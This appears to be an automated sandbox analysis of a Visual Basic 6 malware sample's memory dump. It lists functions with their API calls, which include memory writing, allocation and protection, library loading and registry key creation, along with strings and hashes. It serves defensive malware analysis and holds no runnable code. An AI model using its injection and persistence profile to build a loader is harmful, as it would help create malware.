NtWriteVirtualMemory.NTDLL(?,4332E5BA,?,00000000,?,?,?,?,7630731F,?,-ACB54D55,-4F4731C0), ref: 04F54FEA

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A
oi~, xrefs: 04F548A6

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: H}e>$gyK$oi~$pB
API String ID: 3527976591-3551811396
Opcode ID: f09db34cdb9f6b9a9bea2aa2d2749e0ed8f51192ccf2ec7c74f2101705ad4823
Instruction ID: 97233aa55c81550ee76be7a744261ab87130322407098915b54da33d72c418cd
Opcode Fuzzy Hash: f09db34cdb9f6b9a9bea2aa2d2749e0ed8f51192ccf2ec7c74f2101705ad4823
Instruction Fuzzy Hash: 6D22007260438A9FDB748F74CD557DABBA2FF05320F44461DDE999B260D370AA81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04F54693, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 467nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,4332E5BA,?,00000000,?,?,?,?,7630731F,?,-ACB54D55,-4F4731C0), ref: 04F54FEA

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A
oi~, xrefs: 04F548A6

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: H}e>$gyK$oi~$pB
API String ID: 3527976591-3551811396
Opcode ID: 175fb9543933831031393506446f6ecd6d90d0716bcbbbb564b6a6ec30e17d8e
Instruction ID: 19a286fa9cfe2aecabad94fdce9bc81979f2beb297eeabcdf02f96b6419b61ee
Opcode Fuzzy Hash: 175fb9543933831031393506446f6ecd6d90d0716bcbbbb564b6a6ec30e17d8e
Instruction Fuzzy Hash: 8A22ECB2640389DFDB758F74CD857DA7BB2FF58300F558129ED899B224D370AA818B42

Uniqueness

Uniqueness Score: -1.00%

Function 04F54A2D, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 343COMMON

Download Yara Rule

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: H}e>$gyK$pB
API String ID: 0-1275842295
Opcode ID: edd2f163be53542dcaf71972902c73caba8912cd6f6a69bcbbaa5bf9dfa4867f
Instruction ID: b9656fee938902aa52dafede5d16f958918c173bdaabec54b190af24c3296f6d
Opcode Fuzzy Hash: edd2f163be53542dcaf71972902c73caba8912cd6f6a69bcbbaa5bf9dfa4867f
Instruction Fuzzy Hash: 0FE100B2644388DFDF758F74CC857DA3BA2FF58300F45842AED898B224D3709A858B52

Uniqueness

Uniqueness Score: -1.00%

Function 04F54A46, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 316nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,4332E5BA,?,00000000,?,?,?,?,7630731F,?,-ACB54D55,-4F4731C0), ref: 04F54FEA

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: H}e>$gyK$pB
API String ID: 3527976591-1275842295
Opcode ID: d8641abb53b41d4f10163ffa341806ef57ee5a2541572368aeddae761dd9f6e0
Instruction ID: 64bab957738305a30f9a84f497a9bee5b4ff553f16e66e76f6ac0fcc372e6646
Opcode Fuzzy Hash: d8641abb53b41d4f10163ffa341806ef57ee5a2541572368aeddae761dd9f6e0
Instruction Fuzzy Hash: 73E1DFB2640288DFDF758F74CC857DA3BA2FF58300F55812AED89DB224D7709A858B52

Uniqueness

Uniqueness Score: -1.00%

Function 04F54C15, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 294nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,4332E5BA,?,00000000,?,?,?,?,7630731F,?,-ACB54D55,-4F4731C0), ref: 04F54FEA

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: H}e>$gyK$pB
API String ID: 3527976591-1275842295
Opcode ID: 03874d627c8fcf7a7659cff08e44708890b4bfb719f5c01a416053cfb8aa858a
Instruction ID: c2799dd07873b714a848ee66cb92f91349ca7710a6a98cf2f891ff9c07589384
Opcode Fuzzy Hash: 03874d627c8fcf7a7659cff08e44708890b4bfb719f5c01a416053cfb8aa858a
Instruction Fuzzy Hash: 4FC1047264438A9FDB358F74CD557CA7BA2FF06324F084219DEAD8B2A0D370AA41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04F50CC2, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 446COMMON

Download Yara Rule

Strings

}(;T, xrefs: 04F512E0
|@M}, xrefs: 04F510B0

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: |@M}$}(;T
API String ID: 0-2157801516
Opcode ID: 7b9168efe731a2b5f5881aeae26349f8ff8f948a9cb0b938242815dd5ae1f801
Instruction ID: c24a6517c632a58d3f9a503843a12da2583922ab3e21b35de5b249d000e55d07
Opcode Fuzzy Hash: 7b9168efe731a2b5f5881aeae26349f8ff8f948a9cb0b938242815dd5ae1f801
Instruction Fuzzy Hash: A3022671A0878A9FDB309F38CC497DE7BE2AF45324F594219DD9D8B2A1D330A641CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F58355, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 399COMMON

Download Yara Rule

Strings

~gQj, xrefs: 04F5838A
?fB., xrefs: 04F58ADC

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ?fB.$~gQj
API String ID: 0-331994394
Opcode ID: a37b8f2435da73da57c146cad687f1c22395537c51c96cf50b3aa17223b4948c
Instruction ID: e031a248c2d6f65bb67748bece005c1c6ff96c20e9119ccd6e43c4a1524f8c07
Opcode Fuzzy Hash: a37b8f2435da73da57c146cad687f1c22395537c51c96cf50b3aa17223b4948c
Instruction Fuzzy Hash: 2802C5719083C58FDB31DF38C8987DABBE1AF16364F09829ACC998F2A6D3349545C716

Uniqueness

Uniqueness Score: -1.00%

Function 04F5586A, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 04F573C9: LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

NtAllocateVirtualMemory.NTDLL(46C45625,?,-18D0B40B), ref: 04F55ACC

Strings

_o7, xrefs: 04F506BB
z, xrefs: 04F55BE9

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: z$_o7
API String ID: 2616484454-3303363713
Opcode ID: c516285149f7ca99136a36226aeaa639905c940a28a1e3ff12a99b4500f8eea5
Instruction ID: e1ac6998543ffdcc903a84995ce220652a3b3bc6ee381dae6560108ce704115b
Opcode Fuzzy Hash: c516285149f7ca99136a36226aeaa639905c940a28a1e3ff12a99b4500f8eea5
Instruction Fuzzy Hash: 77815AB2A007999FDB30DF28DC547CE3BE6AF89710F45412ADC48AB354E7709A46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04F5209D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

$K, xrefs: 04F523F1
I7, xrefs: 04F5211C

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $K$I7
API String ID: 0-92547390
Opcode ID: db8531b4f74d7aa9f5474644d4dd29d51ecd1845c0ec3724cc2a7b4428871d90
Instruction ID: d2500e2ed214170b024dfee40897f0e59fee57fe6af95fc017d119046b609fce
Opcode Fuzzy Hash: db8531b4f74d7aa9f5474644d4dd29d51ecd1845c0ec3724cc2a7b4428871d90
Instruction Fuzzy Hash: 54512472605344DFDB389E68CC56BEE37E6AF85300F52816EED8AD7251D6316982CB02

Uniqueness

Uniqueness Score: -1.00%

Function 04F52138, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

$K, xrefs: 04F523F1
I7, xrefs: 04F5211C

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $K$I7
API String ID: 0-92547390
Opcode ID: 11864f22efa048ddd725d72cc7e5b480326ef2917cf56351eab96b762af40b8a
Instruction ID: fe932e5399024504906b2471edc066470624583c64215fa3546d48c923179519
Opcode Fuzzy Hash: 11864f22efa048ddd725d72cc7e5b480326ef2917cf56351eab96b762af40b8a
Instruction Fuzzy Hash: 3B412371604345DFDB389E689C5ABEB37E6AF85304F52412EED8ED7241D7306982CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F520C2, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(?,-AB2423B7), ref: 04F522C9

Strings

$K, xrefs: 04F523F1
I7, xrefs: 04F5211C

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: Create
String ID: $K$I7
API String ID: 2289755597-92547390
Opcode ID: 2991502c7431b10b332441d062d149bb2e2e6fb5b54ef870c15dec52d3142344
Instruction ID: cf3e0f43c7b5f4b0db4648cea148dc60b8a24ecd916b1a256739f82f333cf229
Opcode Fuzzy Hash: 2991502c7431b10b332441d062d149bb2e2e6fb5b54ef870c15dec52d3142344
Instruction Fuzzy Hash: 194124716053459FDB389E689C5A7EB37E6AF85304F52412EED8ED7241D7305982CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00401144, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 588COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401149

Strings

VB5!6&*, xrefs: 00401144

Memory Dump Source

Source File: 00000000.00000002.338044612.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.338036183.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.338060830.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4364e3a55836ec16bba9f0515c66cc419118134ac052a344b99a89ba62e43f8c
Instruction ID: b6900d38e8993300d692d9b191046ab008b8127973ee6a80ff405c4235bb8dc0
Opcode Fuzzy Hash: 4364e3a55836ec16bba9f0515c66cc419118134ac052a344b99a89ba62e43f8c
Instruction Fuzzy Hash: 64F1E22604E3D14FDF175634A8921E6BF70EE5333471A61EBC581AF5B3C2380986C76A

Uniqueness

Uniqueness Score: -1.00%

Function 04F59577, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

H\_m, xrefs: 04F597E2

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: H\_m
API String ID: 0-341976164
Opcode ID: 69fad1237c6eb688affbef8a7f1e3a4c280ccb21c821ce719d7b2779a3bc8421
Instruction ID: 435a1d0eb6ebc734636f558378cc1a91dd46e448c2266d835b086d43601e00bf
Opcode Fuzzy Hash: 69fad1237c6eb688affbef8a7f1e3a4c280ccb21c821ce719d7b2779a3bc8421
Instruction Fuzzy Hash: 21C124B2A04345CFDB38DF78C9947EA7BA2AF59310F91812EDD499B324D7309A46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04F510C2, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 04F55460

Strings

}(;T, xrefs: 04F512E0

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: }(;T
API String ID: 560597551-3741043408
Opcode ID: f9519fbba322b0e47c52b7fc6c0db007b506a8f03cc39dfcaade9871a6446102
Instruction ID: 29db7d77e962684f5e3a9915c467fe0e79dd40628d41f9d3d4a354eee7eab79c
Opcode Fuzzy Hash: f9519fbba322b0e47c52b7fc6c0db007b506a8f03cc39dfcaade9871a6446102
Instruction Fuzzy Hash: 2BB156715087CA9FE7309F78CD553CABBD29F46334F584219CEE98A2A1D371A612C782

Uniqueness

Uniqueness Score: -1.00%

Function 04F558D5, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 04F573C9: LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

NtAllocateVirtualMemory.NTDLL(46C45625,?,-18D0B40B), ref: 04F55ACC

Strings

z, xrefs: 04F55BE9

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: z
API String ID: 2616484454-1657960367
Opcode ID: 0eb4a4263d6a90105dea1b5822c24a27b349d64fada133ffba527d195e540aa0
Instruction ID: 5298bd5b376cc29703f4a4acb66a8b41ad3e1426c5d6500342bfb72f56e53fbe
Opcode Fuzzy Hash: 0eb4a4263d6a90105dea1b5822c24a27b349d64fada133ffba527d195e540aa0
Instruction Fuzzy Hash: D5610A725487DA9FE7208E749D553CABF929F47335F581208DEAD2B2A1E370AA1486C0

Uniqueness

Uniqueness Score: -1.00%

Function 04F5215A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(?,-AB2423B7), ref: 04F522C9

Strings

$K, xrefs: 04F523F1

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: Create
String ID: $K
API String ID: 2289755597-4107791650
Opcode ID: 220de7df4472bcbcbcc40498a265a8b626ff70b6e7b9bab29dd5160bc25416ef
Instruction ID: a013eb3ab33c5408f88bf63573dd20cfc4044782d350e4349c3d3bdb3c266b32
Opcode Fuzzy Hash: 220de7df4472bcbcbcc40498a265a8b626ff70b6e7b9bab29dd5160bc25416ef
Instruction Fuzzy Hash: AE413571604345DFDB388EA88C5A7EB37E6EF45304F52426EED8A97291D7305982CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F55661, Relevance: 3.1, APIs: 2, Instructions: 119filelibraryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42E56218,-000000010940F395), ref: 04F5576D
LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: cbc67d5228187be669a596961b933bf4293d926c8a623901a6a65bf86b1deffb
Instruction ID: 7b72b5aefc938c182b05b6b857dd5c6cfa450eb50ecfe2836aa27e483d7213fb
Opcode Fuzzy Hash: cbc67d5228187be669a596961b933bf4293d926c8a623901a6a65bf86b1deffb
Instruction Fuzzy Hash: 87410171504284AFDF34AF799D88BDA77F6AF98340F11412EEC4C8B624D3309A428B16

Uniqueness

Uniqueness Score: -1.00%

Function 04F55E11, Relevance: 3.0, Strings: 2, Instructions: 487COMMON

Download Yara Rule

Strings

_o7, xrefs: 04F506BB
} H, xrefs: 04F55E17

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: } H$_o7
API String ID: 2167126740-109503836
Opcode ID: 8c9f41a498d076fa9a4dab812b50c3bfc6f2f2fdf5464036cd978421a7959cff
Instruction ID: 639e2a73ffd029ee5e7e762a8a61bb6247ca43c61b44f4b205d742eb9c77744b
Opcode Fuzzy Hash: 8c9f41a498d076fa9a4dab812b50c3bfc6f2f2fdf5464036cd978421a7959cff
Instruction Fuzzy Hash: B3121372904389DFDB349F38CC947DE7BA2AF59300F55412EDE8D9B224D7309A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 04F53FDB, Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42cb47b7d73c82f26e332ef9a69ba4120c104e7f3cee751e2dcf2278c5dedbb
Instruction ID: 89260e5b4b3dcbac8ad2fe6960722d892eef181dee2c23fb93d44d4f8de6a700
Opcode Fuzzy Hash: d42cb47b7d73c82f26e332ef9a69ba4120c104e7f3cee751e2dcf2278c5dedbb
Instruction Fuzzy Hash: 54710372908348DFDB30DE65AD947DA77F2EFA8300F56412A8E4D9B614C730AA438B16

Uniqueness

Uniqueness Score: -1.00%

Function 04F58FBB, Relevance: 1.6, APIs: 1, Instructions: 89nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-425E54EB,?,?,?,?,04F586EC), ref: 04F590CA

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 5108f58a33f87677d268145246f49e94ead3b60dbedc7ee63772f4abd80eae11
Instruction ID: a5e842ab682795cf9aa4d70ac9187c0dd9b2b1539ca7f585029110bd70b5256d
Opcode Fuzzy Hash: 5108f58a33f87677d268145246f49e94ead3b60dbedc7ee63772f4abd80eae11
Instruction Fuzzy Hash: 55310E9210CBCB1DE31086B48E26381DF83CF0733AD5C23088FFE155E2E3A5A620C180

Uniqueness

Uniqueness Score: -1.00%

Function 04F58F67, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-425E54EB,?,?,?,?,04F586EC), ref: 04F590CA

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ee598a0a19800e2b0b64c94c65d77f3e0e87e2011217d6df0c70fbce494b5c24
Instruction ID: f636ddf6b49b7ff90381ada7686178afe4239ea4b417201154b27ff2d2607b92
Opcode Fuzzy Hash: ee598a0a19800e2b0b64c94c65d77f3e0e87e2011217d6df0c70fbce494b5c24
Instruction Fuzzy Hash: 670131B16056959FDF34CE28CC48AEAB7AAEFD8310F45C12ADD0C6B308C6B06D02C795

Uniqueness

Uniqueness Score: -1.00%

Function 04F55BFE, Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,04F51C6E,00000000,?,?,?,?,?,?,?,?,?,00000000,F39898D0,04F56DB9), ref: 04F566C7

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5e50de5bc497dbd9523ae8f66a174e5245a6c85592beec8df011f9261bc843d
Instruction ID: cccd41504e270904c7126058675f46b186cabb0ff0078d0f9ffa82de6636c25f
Opcode Fuzzy Hash: a5e50de5bc497dbd9523ae8f66a174e5245a6c85592beec8df011f9261bc843d
Instruction Fuzzy Hash: F0C022F014800F67E2407BB89C1022922EAAF82600BC0C230CA808B519CF209803A3E2

Uniqueness

Uniqueness Score: -1.00%

Function 04F53424, Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

6=lL, xrefs: 04F533F2

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 6=lL
API String ID: 0-1855268786
Opcode ID: 2143a654d4c35faa598e3f22c8aae899676a3445917bd473c7c6e05dc85cc847
Instruction ID: c24efa77d7442ef7608eaa7af80b7827d3b6f28cd23062f752d28d700e33c456
Opcode Fuzzy Hash: 2143a654d4c35faa598e3f22c8aae899676a3445917bd473c7c6e05dc85cc847
Instruction Fuzzy Hash: B37100B2A043499FDB209F78CD907DABBF2BF49310F558529DD8897214E730AA46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04F52559, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

@~[5, xrefs: 04F526E9

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLongMemoryNamePathVirtual
String ID: @~[5
API String ID: 4035640882-3955458759
Opcode ID: 1ba7b1152ca7505dbb46b61d628173528489a02228a8c18f5aee22c1e34c2e8e
Instruction ID: 8912995e67e21f23724f98832ce71d7238901dd3eb50a0ae5471c292bbc8d523
Opcode Fuzzy Hash: 1ba7b1152ca7505dbb46b61d628173528489a02228a8c18f5aee22c1e34c2e8e
Instruction Fuzzy Hash: 6041C2716012899BDB349F29CC65BDB37A3FF98300F95812DED4D8B254EB309A418B50

Uniqueness

Uniqueness Score: -1.00%

Function 04F55C5C, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: fda43be62b96100b884cc07e6292886b74a72a80c949a661b1ad9c2a73c5b63b
Instruction ID: f88d2e461561a0403fc96b27ab5d7d24c47617cb61ced90e3b28992b3cf1dcd4
Opcode Fuzzy Hash: fda43be62b96100b884cc07e6292886b74a72a80c949a661b1ad9c2a73c5b63b
Instruction Fuzzy Hash: 67D13372A043899FDB34AF78CC947DA7BE2AF49350F51452EDD899B364D7309A82CB01

Uniqueness

Uniqueness Score: -1.00%

Function 04F50BE6, Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 8003aa4ccb7fc5b911d085c5ea763e3d3b33c0719e31d63ab3f049d5276969c0
Instruction ID: 34eb9f0c199a0c489eaf85ad7e4535e351f37660f4a921d01eb77a937833e802
Opcode Fuzzy Hash: 8003aa4ccb7fc5b911d085c5ea763e3d3b33c0719e31d63ab3f049d5276969c0
Instruction Fuzzy Hash: 70B16572A043499FEB34AF38CC947EE77E2AF59350F51412DDE899B224D7309A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 04F584C9, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd3f73e2b841c0bb064cd98fd72c6833005d70ad5a46881176f3e5ef384c4d3
Instruction ID: f89ecf609afc15a037c8d4551c145b7af69c27668d57596e85e229d60ba56f90
Opcode Fuzzy Hash: 4fd3f73e2b841c0bb064cd98fd72c6833005d70ad5a46881176f3e5ef384c4d3
Instruction Fuzzy Hash: FD615572A043459FEB24AF78C9913EE7BF5AF49310F11842DDD89E7214E7709A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F506D9, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d2a9a10f428e7fa7b89e583099292e902958f542cd4e001f268864ec47be13dc
Instruction ID: e6c6f4584bab1bcad6375b0de82de58a8599e73879ce28c33a095f832460a414
Opcode Fuzzy Hash: d2a9a10f428e7fa7b89e583099292e902958f542cd4e001f268864ec47be13dc
Instruction Fuzzy Hash: 13412172A043499FEB24AF39C9907DF7BE6AF49300F11852DDD88D7214E7308A468B42

Uniqueness

Uniqueness Score: -1.00%

Function 04F596EC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 04F59833

Strings

H\_m, xrefs: 04F597E2

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID: H\_m
API String ID: 2335996259-341976164
Opcode ID: aba0815473f76797aec574bb27a3fbe2cd20694fdaa4dc74b2a14da3b641e5ba
Instruction ID: 162cb72abc762769d4eb310ad37aece685d2721cacef8118b03b8ab8ca71ed31
Opcode Fuzzy Hash: aba0815473f76797aec574bb27a3fbe2cd20694fdaa4dc74b2a14da3b641e5ba
Instruction Fuzzy Hash: 5431EFB2D00285CBDF399E69C9847E83B61AF59310F85812ACE1D6F715D374AA42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04F523F8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67registryCOMMON

Download Yara Rule

APIs

Part of subcall function 04F5586A: NtAllocateVirtualMemory.NTDLL(46C45625,?,-18D0B40B), ref: 04F55ACC

RegSetValueExA.KERNELBASE(0000C081,09A5865E,178F17E8), ref: 04F524C2

Strings

_o7, xrefs: 04F506BB

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryValueVirtual
String ID: _o7
API String ID: 115516962-375896732
Opcode ID: ec8d7ba68ee50f8197db1125e79a3045cb32bc2facb1123af8225ab79b9177ed
Instruction ID: 4154d647fd3d0a4739867fda03c0578d46a86bacd0817847bfa9764fff9898c3
Opcode Fuzzy Hash: ec8d7ba68ee50f8197db1125e79a3045cb32bc2facb1123af8225ab79b9177ed
Instruction Fuzzy Hash: 4621057160534A9FD728EE28D8D4AEA37AABF59744F94402EED8AC7251D7319E80CB10

Uniqueness

Uniqueness Score: -1.00%

Function 04F5744A, Relevance: 1.6, APIs: 1, Instructions: 104libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 44ccf2854f2d3a50efdae8aa67dc0e813f7e75e9162beaf7414a5f08e8619053
Instruction ID: 281462c26765da761793cec8652bf4f29253d50709ee4495c1ecc35012236d31
Opcode Fuzzy Hash: 44ccf2854f2d3a50efdae8aa67dc0e813f7e75e9162beaf7414a5f08e8619053
Instruction Fuzzy Hash: 7B31C82210CBDB5EE3114AB4DE66384EF828F0737AF1C1708DFFA055E2E7A5A6208585

Uniqueness

Uniqueness Score: -1.00%

Function 04F5705B, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?), ref: 04F5717F

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 4b403e3079ac9afc990f2321cf906b24fe3f59be40eb76e8d0bb3d364cf98707
Instruction ID: 0ecdc5d9d399fb4cb6303c04b7f94b4dbe6eb9e85d8ebdd06767c461248ba307
Opcode Fuzzy Hash: 4b403e3079ac9afc990f2321cf906b24fe3f59be40eb76e8d0bb3d364cf98707
Instruction Fuzzy Hash: 9D31CD6311DBDB5DE31046B48E66385EF82CF0737AE5C270CDFFA151E2E3A0A6208581

Uniqueness

Uniqueness Score: -1.00%

